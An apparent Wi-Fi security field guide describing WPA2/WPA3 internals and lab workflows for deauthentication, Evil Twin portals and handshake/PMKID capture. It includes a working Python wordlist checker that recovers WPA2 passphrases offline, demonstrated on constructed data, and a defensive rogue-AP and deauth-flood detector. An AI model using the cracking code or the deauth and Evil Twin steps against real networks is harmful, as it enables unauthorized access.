Wi-Fi at 2.4/5/6 GHz connects nearly everything. This page gives a concise field guide:
signal basics, common research workflows (in a lab), defenses, FAQs, and devices that excel at Wi-Fi testing.
Quick-start checklist
Permission & scope: Only test networks you own or have explicit written authorization to assess.
Define goals: Recon only? Lab capture of handshakes? Evil Twin UX testing? Keep it scoped and safe.
Pick band & channels: 2.4 GHz (crowded, long range), 5 GHz (cleaner), 6 GHz (Wi-Fi 6E; reduced legacy noise).
Tooling ready: One recon/sniffer radio + (optionally) a second for AP/attack simulations in a lab.
Wi-Fi is IEEE 802.11. Devices exchange management frames (beacons, probe req/resp, auth/assoc/deauth),
control frames (RTS/CTS/ACK), and data frames (payload). The security layer (WPA2/WPA3, i.e. the 802.11i RSN)
runs after association: the 4-way handshake is carried in EAPOL-Key data frames, and only once it completes is the data path encrypted.
Bands & channels: 2.4 GHz (1–13; 14 is Japan-only), 5 GHz (36–177; 36–165 in most regulatory domains), 6 GHz (1–233; Wi-Fi 6E). Channel width
(20/40/80/160 MHz) trades throughput against interference; don’t bond to 80/160 MHz in noisy environments.
Association precedes key exchange and encryption. For WPA2-PSK the PMK is PBKDF2-SHA1(passphrase, SSID); for WPA3 it comes from the SAE exchange carried in Authentication frames before association. In both cases the 4-way handshake then derives the PTK (session keys) from the PMK, both MAC addresses and both nonces.
Common research workflows
1) Recon & channel planning (passive)
Scan bands to inventory APs, SSIDs (open/secured/hidden), and clients; record RSSI and capabilities (11n/ac/ax; WPA versions; PMF capable/required).
2) 4-way handshake capture (WPA2-PSK, lab)
For WPA2-PSK: passively wait for a client to (re)associate, or, in a lab, deauthenticate your own client to force a fresh 4-way handshake. Clients that negotiated PMF drop forged deauths, so expect this to fail on 802.11w-required SSIDs.
Validate the capture: you need M1 (ANonce) and M2 (SNonce plus MIC) from the same exchange, or M2 and M3, with matching EAPOL replay counters (M1/M2 share one value, M3/M4 the next) and a non-zero MIC; store PCAPs with metadata (SSID, BSSID, channel, time).
3) Evil Twin / captive portal UX testing (lab)
Clone SSID/BSSID/channel in an isolated lab. Present a portal for awareness training or UX resilience testing.
Measure client behavior: auto-join? certificate warnings? HSTS blocks? Only perform on your test clients.
4) PMKID capture (WPA2-PSK, lab)
When the AP includes a PMKID in the first EAPOL-Key message (M1), which many APs do when PMK caching or fast roaming is enabled, that single frame is enough for offline testing: PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC). No legitimate client or deauth is needed, because your own test station can start the association. Lab-only and with authorization.
5) 6 GHz & WPA3-SAE behavior
6 GHz operation requires WPA3: SAE (or OWE for open networks) with PMF mandatory; WPA2 and unencrypted open SSIDs are not permitted on that band. Test client/AP compatibility, WPA3 transition mode (SAE and PSK on one SSID, which leaves a WPA2 path for clients that choose it), and roaming. Validate PMF policies (optional vs required).
Ethics: Deauth, Evil Twin, and credential harvesting must be performed in a controlled lab or explicit engagement scope. Do not touch networks you don’t own or control.
WPA2/WPA3 lab notes
WPA2-PSK: PMK = PBKDF2-SHA1(passphrase, SSID); the 4-way handshake derives the PTK from the PMK, both MACs and both nonces, and the MIC on M2 lets a capture be checked against candidate passphrases offline. That is why captures measure password strength (on test networks only).
WPA3-SAE: The Dragonfly handshake is a PAKE, so a passive capture yields nothing that can be checked offline; each guess costs a live exchange that the AP can rate-limit. Verify the SAE groups offered (group 19 is the mandatory WPA3 group; disable weaker groups), PMF enforcement, and whether transition mode exposes a WPA2 fallback.
Enterprise (802.1X/EAP): Focus on server certificate validation in client profiles (trusted CA and expected server name), EAP method choice (EAP-TLS over tunneled password methods where feasible), RADIUS server config, and downgrade resistance.
PMF (802.11w): Authenticates deauth/disassociation and robust action frames, so forged deauths are dropped; it is mandatory with WPA3. Set it to “required” on sensitive SSIDs when clients permit.
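The following is an added example for the handshake-capture, PMKID and WPA2-PSK notes above; it is not code from this page or from any tool the page names. It implements the standard WPA2-PSK derivations for AKM 00-0F-AC:2 (PBKDF2-SHA1 PSK, PMKID, PRF-512 PTK, HMAC-SHA1-128 EAPOL-Key MIC) and uses them to test candidate passphrases against a PMKID and against the MIC on message 2. The SSID, MAC addresses, nonces, lab passphrase and the "captured" frames are constructed inside the block, since no real capture is available on the page; the only real-world value is the published IEEE 802.11 PSK test vector used as a self-check.

```python
# Added example: offline passphrase check against a PMKID and a 4-way handshake
# (WPA2-PSK, AKM 00-0F-AC:2). Everything under "Constructed lab capture" is made up.
import hashlib
import hmac

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # WPA2-PSK: PMK = PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = Truncate-128(HMAC-SHA1(PMK, "PMK Name" || AA || SPA)); carried in M1 key data
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce))
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # four 20-byte HMAC-SHA1 blocks, truncated to 64 bytes
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]  # KCK = [0:16], KEK = [16:32], TK = [32:48]

# EAPOL-Key layout: EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + reserved (8) -> MIC field at offset 81
MIC_OFFSET = 81

def build_eapol_m2(snonce: bytes, replay_counter: int, key_data: bytes, mic: bytes = bytes(16)) -> bytes:
    body = (bytes([0x02])                          # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")          # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC bit
            + (0).to_bytes(2, "big")               # key length is 0 in M2
            + replay_counter.to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, reserved
            + mic + len(key_data).to_bytes(2, "big") + key_data)
    return bytes([0x02, 0x03]) + len(body).to_bytes(2, "big") + body  # EAPOL v2, type 3 = Key

def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    # MIC = HMAC-SHA1-128 over the whole EAPOL frame with the MIC field zeroed
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def passphrase_matches_pmkid(cand, ssid, ap_mac, sta_mac, captured_pmkid) -> bool:
    return hmac.compare_digest(pmkid(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac), captured_pmkid)

def passphrase_matches_handshake(cand, ssid, ap_mac, sta_mac, anonce, snonce, eapol_m2) -> bool:
    ptk = ptk_from_pmk(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac, anonce, snonce)
    return hmac.compare_digest(eapol_mic(ptk[:16], eapol_m2), eapol_m2[MIC_OFFSET:MIC_OFFSET + 16])

def check_known_vector() -> bool:
    # IEEE 802.11 published PSK test vector: passphrase "password", SSID "IEEE"
    return pmk_from_passphrase("password", "IEEE").hex() == (
        "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")

# Constructed lab capture (assumed values; not from any real network)
SSID = "lab-ssid"
AP_MAC = bytes.fromhex("02aabbcc0001")
STA_MAC = bytes.fromhex("02ddeeff0002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(100, 132))
LAB_PASSPHRASE = "correct horse battery"   # what the (hypothetical) lab AP was configured with

def constructed_capture():
    """Synthesize the PMKID (from M1) and the MIC-bearing M2 that a sniffer would have recorded."""
    pmk = pmk_from_passphrase(LAB_PASSPHRASE, SSID)
    ptk = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    m2 = build_eapol_m2(SNONCE, replay_counter=1, key_data=b"")
    m2 = m2[:MIC_OFFSET] + eapol_mic(ptk[:16], m2) + m2[MIC_OFFSET + 16:]
    return pmkid(pmk, AP_MAC, STA_MAC), m2

def run_wordlist(wordlist):
    """Return the first candidate that matches both the PMKID and the M2 MIC, else None."""
    captured_pmkid, m2 = constructed_capture()
    for cand in wordlist:
        if (passphrase_matches_pmkid(cand, SSID, AP_MAC, STA_MAC, captured_pmkid)
                and passphrase_matches_handshake(cand, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, m2)):
            return cand
    return None

if __name__ == "__main__":
    print("test vector ok:", check_known_vector())
    print("recovered:", run_wordlist(["password", "letmein", LAB_PASSPHRASE]))
```

Two things worth noticing: the PMKID check needs only M1 plus the two MAC addresses, while the handshake check additionally needs both nonces and an intact M2, which is why a capture should be validated for matching replay counters before any cracking time is spent. Both checks cost one PBKDF2 run (4096 SHA-1 iterations) per candidate, so the passphrase's entropy, not the protocol, is what sets the work factor.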
Blue-team & hardening
Strong auth: Prefer WPA3-SAE (or 802.1X with EAP-TLS) with PMF=required where the client base supports it; treat transition mode as temporary, since it keeps a WPA2 path open.
RF hygiene: Plan non-overlapping channels; right-size channel widths; avoid excessive transmit power that bleeds beyond premises.
Rogue AP detection: Monitor for your SSIDs beaconed from unknown BSSIDs, BSSID spoofing, bursts of deauth frames (forged ones carry your own AP’s address), and beacons on 6 GHz where you run no 6E APs.
Client policy: Disable auto-join to open networks; enforce server certificate validation (trusted CA and expected server name) in 802.1X client profiles; use DNS filtering, and HSTS on your own web properties.
Segmentation: Separate guest/IoT from corporate; egress controls; rate-limit onboarding portals.
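As an added example for the rogue-AP detection point above (not code from this page or from any WIDS product), the three checks it lists run here over a constructed stream of management-frame observations. The record layout, the authorized SSID/BSSID inventory and the sample frames are this example's own assumptions; the band test uses frequency rather than channel number because 2.4 GHz and 6 GHz both have a "channel 1".

```python
# Added example: SSID spoofing, unexpected 6 GHz beacons and deauth bursts over a
# constructed observation stream. Inventory and observations are made up for the demo.
from collections import defaultdict

# Authorized inventory: SSID -> set of BSSIDs allowed to beacon it (constructed)
AUTHORIZED = {
    "corp-wifi": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"},
    "corp-guest": {"aa:bb:cc:00:00:03"},
}

# Observation: (time_s, frame_subtype, address, ssid, freq_mhz). For deauth frames the
# address is the BSSID the frame claims to come from, which a forger copies from our AP.
OBSERVATIONS = (
    [(0.0, "beacon", "aa:bb:cc:00:00:01", "corp-wifi", 5180),
     (0.1, "beacon", "aa:bb:cc:00:00:02", "corp-wifi", 5220),
     (0.2, "beacon", "aa:bb:cc:00:00:03", "corp-guest", 2437),
     (0.3, "beacon", "de:ad:be:ef:00:01", "corp-wifi", 2437),    # evil twin: our SSID, unknown BSSID
     (0.4, "beacon", "de:ad:be:ef:00:02", "corp-wifi", 5955),    # same, on 6 GHz where we run nothing
     (0.5, "beacon", "12:34:56:78:9a:bc", "coffee-shop", 2412)]  # neighbour's SSID: not an alert
    # forged deauth flood "from" the corp AP's own BSSID: 15 frames in under 0.3 s
    + [(1.0 + i * 0.02, "deauth", "aa:bb:cc:00:00:01", None, 5180) for i in range(15)]
    # normal, sparse deauths from the guest AP
    + [(5.0 + i * 5.0, "deauth", "aa:bb:cc:00:00:03", None, 2437) for i in range(3)]
)

def in_6ghz(freq_mhz: int) -> bool:
    return 5925 <= freq_mhz <= 7125

def find_spoofed_ssids(observations, authorized):
    """Beacons advertising one of our SSIDs from a BSSID that is not in inventory."""
    alerts, seen = [], set()
    for ts, subtype, addr, ssid, freq in observations:
        if subtype != "beacon" or ssid not in authorized:
            continue
        if addr not in authorized[ssid] and addr not in seen:
            seen.add(addr)
            alerts.append({"ssid": ssid, "bssid": addr, "freq_mhz": freq, "first_seen": ts})
    return alerts

def find_unexpected_6ghz(observations, expected_6ghz_bssids=frozenset()):
    """Any 6 GHz beacon from a BSSID we do not operate there (any SSID)."""
    alerts, seen = [], set()
    for ts, subtype, addr, ssid, freq in observations:
        if subtype == "beacon" and in_6ghz(freq) and addr not in expected_6ghz_bssids and addr not in seen:
            seen.add(addr)
            alerts.append({"ssid": ssid, "bssid": addr, "freq_mhz": freq, "first_seen": ts})
    return alerts

def find_deauth_bursts(observations, window_s=1.0, threshold=10):
    """Sliding window per claimed BSSID. The address names the AP being impersonated
    (or the real AP misbehaving), not necessarily the true transmitter."""
    times_by_addr = defaultdict(list)
    for ts, subtype, addr, _ssid, _freq in observations:
        if subtype == "deauth":
            times_by_addr[addr].append(ts)
    alerts = []
    for addr, times in times_by_addr.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window_s:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({"bssid": addr, "window_start": times[start], "count": end - start + 1})
                break  # one alert per address is enough to page on
    return alerts

def run_all(observations=OBSERVATIONS, authorized=AUTHORIZED, expected_6ghz_bssids=frozenset()):
    return {
        "spoofed_ssid": find_spoofed_ssids(observations, authorized),
        "unexpected_6ghz": find_unexpected_6ghz(observations, expected_6ghz_bssids),
        "deauth_burst": find_deauth_bursts(observations),
    }

if __name__ == "__main__":
    for kind, alerts in run_all().items():
        print(kind, alerts)
```

The deauth detector deliberately keys on the claimed BSSID rather than trying to attribute a sender: an attacker forges the AP's own address, so the useful signal is the rate, and the right response is to confirm whether the real AP sent anything (its logs will show no such deauths) and to move the SSID to PMF=required so clients ignore the forgeries.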